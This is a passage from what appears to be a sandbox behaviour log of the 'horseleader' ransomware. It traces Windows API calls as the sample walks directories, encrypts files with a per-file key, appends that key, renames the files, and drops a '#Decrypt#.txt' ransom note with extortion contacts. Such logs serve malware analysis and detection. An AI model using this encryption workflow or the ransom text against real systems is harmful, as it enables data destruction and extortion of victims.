Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 79 [0247.328] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.328] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.328] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.328] lstrlenW (lpString=".testttjffg") returned 11 [0247.328] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.329] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.329] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 79 [0247.330] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.330] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=44850) returned 1 [0247.331] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.333] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.334] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.335] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.335] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.336] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xf32, lpOverlapped=0x0) returned 1 [0247.336] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff0ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xf32, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xf32, lpOverlapped=0x0) returned 1 [0247.337] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.337] CloseHandle (hObject=0x1a4) returned 1 [0247.337] GetProcessHeap () returned 0x780000 [0247.337] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.338] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.horseleader") returned 91 [0247.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.horseleader")) returned 1 [0247.339] GetProcessHeap () returned 0x780000 [0247.339] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.339] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xaf32, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.339] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.339] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\#Decrypt#.txt") returned 80 [0247.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.340] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.340] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.342] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.342] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.342] CloseHandle (hObject=0x158) returned 1 [0247.342] GetProcessHeap () returned 0x780000 [0247.342] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.342] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0247.342] lstrcmpiW (lpString1="LEVEL", lpString2="Windows") returned -1 [0247.343] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned 65 [0247.343] lstrcmpW (lpString1="LEVEL", lpString2=".") returned 1 [0247.343] lstrcmpW (lpString1="LEVEL", lpString2="..") returned 1 [0247.343] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.343] GetProcessHeap () returned 0x780000 [0247.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.343] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*") returned 67 [0247.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.344] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.344] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\.") returned 67 [0247.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.344] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.344] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.344] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\..") returned 68 [0247.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.344] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.344] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f400, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa85f400, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe2ec, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LEVEL.ELM", cAlternateFileName="")) returned 1 [0247.345] lstrcmpiW (lpString1="LEVEL.ELM", lpString2="Windows") returned -1 [0247.345] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 75 [0247.345] StrStrIW (lpFirst="LEVEL.ELM", lpSrch=".horseleader") returned 0x0 [0247.345] lstrcmpW (lpString1="LEVEL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.345] lstrcmpW (lpString1="LEVEL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.345] lstrlenW (lpString=".testttjffg") returned 11 [0247.345] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.345] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.345] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.345] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 75 [0247.348] StrStrW (lpFirst="LEVEL.ELM", lpSrch=".txt") returned 0x0 [0247.348] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=58092) returned 1 [0247.348] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.351] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.352] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.353] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.353] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.353] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x42ec, lpOverlapped=0x0) returned 1 [0247.354] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbd14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.354] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x42ec, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x42ec, lpOverlapped=0x0) returned 1 [0247.354] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.354] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.354] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.355] CloseHandle (hObject=0x1a4) returned 1 [0247.355] GetProcessHeap () returned 0x780000 [0247.355] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.355] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM.horseleader") returned 87 [0247.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm.horseleader")) returned 1 [0247.356] GetProcessHeap () returned 0x780000 [0247.356] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.356] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x20e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LEVEL.INF", cAlternateFileName="")) returned 1 [0247.356] lstrcmpiW (lpString1="LEVEL.INF", lpString2="Windows") returned -1 [0247.357] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 75 [0247.357] StrStrIW (lpFirst="LEVEL.INF", lpSrch=".horseleader") returned 0x0 [0247.357] lstrcmpW (lpString1="LEVEL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.357] lstrcmpW (lpString1="LEVEL.INF", lpString2="_uninstalling_.png") returned 1 [0247.357] lstrlenW (lpString=".testttjffg") returned 11 [0247.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF", lpSrch=".testttjffg") returned 0x0 [0247.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 75 [0247.358] StrStrW (lpFirst="LEVEL.INF", lpSrch=".txt") returned 0x0 [0247.358] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=526) returned 1 [0247.358] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x20e, lpOverlapped=0x0) returned 1 [0247.360] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.360] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x20e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x20e, lpOverlapped=0x0) returned 1 [0247.361] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.361] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.361] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.361] CloseHandle (hObject=0x1a4) returned 1 [0247.362] GetProcessHeap () returned 0x780000 [0247.362] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.362] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF.horseleader") returned 87 [0247.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf.horseleader")) returned 1 [0247.368] GetProcessHeap () returned 0x780000 [0247.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.368] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x563, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.369] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.369] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 77 [0247.369] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") 